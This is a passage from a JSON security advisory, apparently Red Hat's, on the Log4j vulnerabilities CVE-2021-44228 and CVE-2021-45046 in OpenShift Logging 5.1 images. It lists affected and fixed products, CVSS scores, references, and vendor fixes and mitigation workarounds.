"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "RHBZ#2030932",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2030932"
},
{
"category": "external",
"summary": "RHSB-2021-009",
"url": "https://access.redhat.com/security/vulnerabilities/RHSB-2021-009"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-44228",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44228"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q",
"url": "https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.lunasec.io/docs/blog/log4j-zero-day/",
"url": "https://www.lunasec.io/docs/blog/log4j-zero-day/"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-10T02:01:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:09:12+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
},
{
"category": "workaround",
"details": "For Log4j versions \u003e=2.10\nset the system property log4j2.formatMsgNoLookups or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to true\n\nFor Log4j versions \u003e=2.7 and \u003c=2.14.1\nall PatternLayout patterns can be modified to specify the message converter as %m{nolookups} instead of just %m\n\nFor Log4j versions \u003e=2.0-beta9 and \u003c=2.10.0\nremove the JndiLookup class from the classpath. For example: \n```\nzip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class\n```\n\nOn OpenShift 4 and in OpenShift Logging, the above mitigation can be applied by following the steps in this article: https://access.redhat.com/solutions/6578421\n\nOn OpenShift 3.11, mitigation to the affected Elasticsearch component can be applied by following the steps in this article: https://access.redhat.com/solutions/6578441",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"threats": [
{
"category": "exploit_status",
"date": "2021-12-10T00:00:00+00:00",
"details": "CISA: https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
},
{
"category": "impact",
"details": "Moderate"
}
],
"title": "log4j-core: Remote code execution in Log4j 2.x when logs contain an attacker-controlled string value"
},
{
"cve": "CVE-2021-45046",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"discovery_date": "2021-12-14T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2032580"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Apache Log4j logging library in versions from 2.0.0 and before 2.16.0. A remote attacker with control over Thread Context Map (MDC) input data could craft malicious input using a JNDI Lookup pattern resulting in remote code execution (RCE) in a limited number of environments.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "log4j-core: DoS in log4j 2.x with thread context message pattern and context lookup pattern (incomplete fix for CVE-2021-44228)",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Although we have matched Apache\u0027s CVSS score, with the exception of the scope metric which will remain unaltered at \"unchanged\"; as we believe code execution would be at the permission levels of the running JVM and not exceeding that of the original CVE-2021-44228 flaw.\n \nWe have given this vulnerability an impact rating of Moderate, this is because of the unlikely nature of log4j lookup mapping values being derived from attacker controlled values. This is not the default configuration for end-applications using log4j 2.x and would require explicit action from a privileged user (a developer or administrator) to access the vulnerability. \nIn certain non-default configurations, it was found that the fix to address CVE-2021-44228 in Apache Log4j 2.15.0 was insufficient.\n\nThis issue affects the log4j version between 2.0 and 2.15. Log4j 1.x is NOT impacted by this vulnerability. \n\nPrerequisites to exploit this flaw are :\n\n- A remotely accessible endpoint with any protocol (HTTP, TCP, etc) that allows an attacker to send arbitrary data,\n- A log statement in the endpoint that logs the attacker controlled data.\n- Log4j configuration file should be explicitly configured to use a non-default Pattern Layout with a Context Lookup eg. ($${ctx:loginId}) \n\nIn most cases, the mitigation suggested for CVE-2021-44228 (i.e. to set the system property `log4j2.noFormatMsgLookup` to `true) does NOT mitigate this specific vulnerability. \nLog4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default.\n\nFor Elasticsearch, as shipped in OpenShift 3.11, the \"log4j2.formatMsgNoLookups=true\" system property mitigation is sufficient as there are no included non-standard configurations that allow for exploitation:\n\nhttps://github.com/openshift/openshift-ansible/blob/release-3.11/roles/openshift_logging_elasticsearch/templates/log4j2.properties.j2\n\nhttps://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476\n\nFor CodeReady Studio the fix for this flaw is available on CodeReady Studio 12.21.3 and above versions.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"known_not_affected": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:70aca191fa4fe95e857f8cba3925d88e9965e8c868c6362e00ad0ce912360a99_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:76573c99dcd3f44e6bc81b018867ee3bfe3c33ea1878c63675a39e85b4c72de5_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-operator-bundle@sha256:862602f0b5cf3dc1bdd69f236d09a4bf1630fdd77e7faf30a1f4858558360202_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:09eb62fb9c67251f67cf13bbd840c274d879285cb3151e4540df5c9e286debff_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:551c671792f1d97cf00b1c52b8645d6aa734655bc834f280013408e2d6101b81_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-proxy-rhel8@sha256:c57ce065696844f5c5d0e09969d228f79423b2d1d2f97a5a539c87fb3de63793_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:0807527589e608dec6aa6f94cccac8cf89331a86cdb193139f88c375604c9afe_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:2467fb3d733e318b3ce1474301361af0247580b7abf9b8b2d3482707d0272949_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch-rhel8-operator@sha256:5e9ed1c4e59daccc7ed0a3418900f8088f8307016311b670e7d23be304b61f36_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:b85c8866c068409bee0b7f162e3a5f04c075c221d04bc7f6347ca3f9e022840a_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:c47fda436df07eaab5a3878c37c43b6ce401c216f5207a6d9b2d1017d5ad1a62_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/eventrouter-rhel8@sha256:cb3c3b89d3969a1ffe6b11b343cda4c074f3f87572dfc2b6b4d681802b4c420c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:623dd6d9c57ed7c44e57f5f7ddfbc5b16dc986b86a20188781ebefdde9f87f0d_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:760f9ed42e7634fc246fc638985802d84df561d87c80628ba7bf7db8543e0007_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/fluentd-rhel8@sha256:8a21d9ea3bcc997ddaa38cf7115b8ad982d9e019beece3dd52a027aeaf211c3e_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:2d9f4a1319755cdfdf5e1cf8bd7a12edc6e17b5a85fef5f10a067e5a936a095b_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:b3cdddf65666934636aa6a6a7cf3c9f00d4f793cfb0b9eef8e0aacf04b6fb7c0_ppc64le",
"8Base-OSE-LOGGING-5.1:openshift-logging/kibana6-rhel8@sha256:f68496878ed86375e0d28d4b01d1686e1af078582710576fcb8a1a4b7c6ec20f_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2021-45046"
},
{
"category": "external",
"summary": "RHBZ#2032580",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2032580"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2021-45046",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-45046"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-45046"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/cve/CVE-2021-44228",
"url": "https://access.redhat.com/security/cve/CVE-2021-44228"
},
{
"category": "external",
"summary": "https://logging.apache.org/log4j/2.x/security.html",
"url": "https://logging.apache.org/log4j/2.x/security.html"
},
{
"category": "external",
"summary": "https://www.openwall.com/lists/oss-security/2021/12/14/4",
"url": "https://www.openwall.com/lists/oss-security/2021/12/14/4"
},
{
"category": "external",
"summary": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog"
}
],
"release_date": "2021-12-14T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2021-12-14T18:09:12+00:00",
"details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.1, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.8/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:315b9b9057b2893d0e14fe7c3e2809066ce90b5b42863934de93734ee26d212c_s390x",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:711054937975c1e7061381bdcadd90ca8192648624888b6ba999dbedf616f8ed_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/elasticsearch6-rhel8@sha256:fca86030c0886e0c41d4000d4907e6a58717b95c206d34dba5197d44aa8d6d02_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2021:5128"
},
{
"category": "workaround",
"details": "For Log4j versions up to and including 2.15.0, this issue can be mitigated by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).",
"product_ids": [
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-operator-bundle@sha256:9ff35e6d560796a50b470c75ba6862cc79c6d9e30074e4a3f2c606fae3722956_amd64",
"8Base-OSE-LOGGING-5.1:openshift-logging/cluster-logging-rhel8-operator@sha256:64a4376815864ae9b521396b510a0d1627665142b14cd3c2e3aa9452231a542e_s390x",
